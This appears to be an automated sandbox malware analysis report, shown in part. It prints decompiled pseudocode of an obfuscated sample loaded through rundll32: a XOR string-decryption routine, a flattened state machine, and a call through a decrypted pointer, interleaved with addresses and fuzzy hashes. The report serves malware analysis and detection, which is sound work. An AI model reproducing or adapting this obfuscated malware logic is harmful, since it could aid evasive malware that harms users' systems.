				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0024602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00248736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00258799
0x0025879a
0x0025879f
0x002587a0
0x002587a5
0x002587ad
0x002587ad
0x002587b0
0x002587b8
0x002587c0
0x002587c8
0x002587d0
0x002587d8
0x002587e0
0x002587e8
0x002587f0
0x002587f8
0x002587fc
0x002587ff
0x00258801
0x00258805
0x00258809
0x00258819
0x00258824
0x00258832
0x00258834
0x0025883c
0x00258844
0x00258846
0x00258857
0x0025885c
0x0025885e
0x00258862
0x00258862
0x00258864
0x00258867
0x00258869
0x00258870
0x00258873
0x00258876
0x00258879
0x0025887f
0x00258880
0x00258883
0x00258887
0x00258887
0x00258890
0x00258890
0x0025889c

Strings

5Ur, xrefs: 002587D8
j, xrefs: 002587E0

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: eec462efa2cb403da049f5dd1ed0cf6e47776052ef4e385c1c4b5b1698939aa9
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: 3031AD72A093018FD314CF29C88545BFBE0EF98714F454B5DE989A7251C774E90ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 00259586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00259586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x25c860);
					_push(_v20);
					_t80 = E0025878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00256965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00252025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x0025958c
0x00259590
0x00259597
0x0025959e
0x002595a2
0x002595a6
0x002595ad
0x002595b4
0x002595bb
0x002595c2
0x002595cf
0x002595d6
0x002595dd
0x002595e6
0x002595ed
0x002595f0
0x002595f7
0x002595fe
0x00259605
0x0025960c
0x00259613
0x0025961a
0x00259621
0x00259628
0x0025962f
0x00259636
0x0025963d
0x00259644
0x0025964b
0x0025964f
0x00259656
0x00259661
0x00259668
0x0025966b
0x0025966f
0x00259679
0x0025967c
0x0025967e
0x00259681
0x00259686
0x0025968f
0x00259694
0x00259697
0x00259699
0x002596a1
0x002596ab
0x002596ad
0x002596ad
0x002596ba
0x002596c1
0x002596c8

Strings

I, xrefs: 002595A6
4, xrefs: 00259628

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: c0cc3ed7f4e6c0e6d786caaf46d58af62ad8a18f7d647b5fe573ce973da24075
Instruction ID: b620dbb8474b99da327574cdc5d89952c506f4395507aa2a9e1c18b4013ce116
Opcode Fuzzy Hash: c0cc3ed7f4e6c0e6d786caaf46d58af62ad8a18f7d647b5fe573ce973da24075
Instruction Fuzzy Hash: E7411371D0030AEBEF04DFA1C94A6EEBBB1FB44314F208159D811B6290D3B99B59CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00247998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00247998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0024602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0025360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00252674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x0024799f
0x002479a3
0x002479a6
0x002479a9
0x002479aa
0x002479ad
0x002479b2
0x002479bb
0x002479bf
0x002479c6
0x002479cd
0x002479d4
0x002479db
0x002479e7
0x002479ec
0x002479f1
0x002479f8
0x002479ff
0x00247a06
0x00247a0d
0x00247a14
0x00247a19
0x00247a1c
0x00247a23
0x00247a2a
0x00247a31
0x00247a38
0x00247a3f
0x00247a46
0x00247a4a
0x00247a51
0x00247a58
0x00247a63
0x00247a66
0x00247a6a
0x00247a71
0x00247a84
0x00247a9d
0x00247aa2
0x00247aa8
0x00247ab0

Strings

JX, xrefs: 00247A06
[m1, xrefs: 002479D4

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: 8d051f0b849876c74c29fc0f07a456dcaa103f9c29986c82aa962bf72abb82eb
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: C0310475900209FBCF58CFA5D94A89EBBB5FF44354F20C059E9196A260D3799B24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00249A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00249A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00247998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00247998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0025360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0025360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00248736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0025360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002550F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00257F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00247998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0025360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0025360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00249a43
0x00249a46
0x00249a48
0x00249a4a
0x00249a4d
0x00249a4e
0x00249a4f
0x00249a54
0x00249a5b
0x00249a5e
0x00249a64
0x00249a68
0x00249a6d
0x00249a70
0x00249a77
0x00249a7e
0x00249a85
0x00249a8c
0x00249a93
0x00249a97
0x00249aa4
0x00249aa7
0x00249aaa
0x00249ab1
0x00249ab8
0x00249abf
0x00249ac6
0x00249acd
0x00249ad4
0x00249adf
0x00249ae2
0x00249ae9
0x00249af0
0x00249af7
0x00249afe
0x00249b09
0x00249b0c
0x00249b10
0x00249b17
0x00249b1e
0x00249b22
0x00249b29
0x00249b34
0x00249b37
0x00249b45
0x00249b48
0x00249b4f
0x00249b59
0x00249b5c
0x00249b5f
0x00249b66
0x00249b6d
0x00249b74
0x00249b7b
0x00249b82
0x00249b89
0x00249b90
0x00249b97
0x00249b9e
0x00249ba5
0x00249bac
0x00249bb3
0x00249bba
0x00249bc1
0x00249bc8
0x00249bcf
0x00249bd6
0x00249bdf
0x00249be6
0x00249bed
0x00249bf4
0x00249bf8
0x00249bff
0x00249c06
0x00249c13
0x00249c16
0x00249c19
0x00249c20
0x00249c27
0x00249c2e
0x00249c32
0x00249c39
0x00249c47
0x00249c4a
0x00249c51
0x00249c58
0x00249c5f
0x00249c69
0x00249c6e
0x00249c76
0x00249c7b
0x00249c80
0x00249c87
0x00249c8e
0x00249c95
0x00249c9c
0x00249ca7
0x00249ca8
0x00249cab
0x00249cb2
0x00249cb9
0x00249cbd
0x00249cc4
0x00249ccb
0x00249cd2
0x00249cd9
0x00249ce0
0x00249ce7
0x00249ceb
0x00249cef
0x00249cf6
0x00249cfd
0x00249d09
0x00249d0c
0x00249d13
0x00249d1a
0x00249d25
0x00249d28
0x00249d2f
0x00249d36
0x00249d3d
0x00249d41
0x00249d48
0x00249d4f
0x00249d56
0x00249d5d
0x00249d64
0x00249d68
0x00249d6f
0x00249d76
0x00249d7d
0x00249d84
0x00249d8b
0x00249d92
0x00249d96
0x00249d9d
0x00249da8
0x00249dab
0x00249daf
0x00249daf
0x00249db6
0x00249db6
0x00249db6
0x00249db6
0x00249dbc
0x00000000
0x00000000
0x00249dc2
0x00249ee5
0x00249eea
0x00249eed
0x00000000
0x00249dc8
0x00249dce
0x00249ebf
0x00249ec4
0x00249ec7
0x00000000
0x00249dd4
0x00249dda
0x00249e9a
0x00249e9d
0x00249ea2
0x00000000
0x00249de0
0x00249de6
0x00249e79
0x00249e88
0x00249e8d
0x00249e90
0x00000000
0x00249dec
0x00249df2
0x00249e55
0x00249e64
0x00249e69
0x00249e6c
0x00000000
0x00249df4
0x00249dfa
0x00249e32
0x00249e37
0x00249e3c
0x00249e3f
0x00249e40
0x00249e42
0x00249e48
0x00000000
0x00249e48
0x00249dfc
0x00249e02
0x00000000
0x00249e08
0x00249e0b
0x00249e1a
0x00249e1f
0x00249e22
0x00000000
0x00249e22
0x00249e02
0x00249dfa
0x00249df2
0x00249de6
0x00249dda
0x00249dce
0x00249f45
0x00249f47
0x00249f4b
0x00249f4b
0x00249f52
0x00249f52
0x00249ef7
0x00249efd
0x00249fbe
0x00249fc3
0x00249fc6
0x00000000
0x00249f03
0x00249f03
0x00249f09
0x00249fa1
0x00249fa4
0x00000000
0x00249f0f
0x00249f0f
0x00249f15
0x00249f88
0x00249f8d
0x00249f90
0x00000000
0x00249f17
0x00249f17
0x00249f1d
0x00249f65
0x00249f6a
0x00249f6d
0x00000000
0x00249f1f
0x00249f1f
0x00249f25
0x00000000
0x00249f2b
0x00249f3d
0x00249f42
0x00249f25
0x00249f1d
0x00249f15
0x00249f09
0x00000000
0x00249fcb
0x00249fcb
0x00249fcb
0x00000000

Strings

'Vj, xrefs: 00249D96

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: 7c38e004969933c3ba526e76d0bd22d597ed6c975e447848c572e6647a4ab8c7
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: 3FF14272C1031ADBDF18DFE5C98A9DEBBB1FB00314F248159D416BA2A0D3B41A9ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 00251BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00251BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x25ca2c; // 0x2c8300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
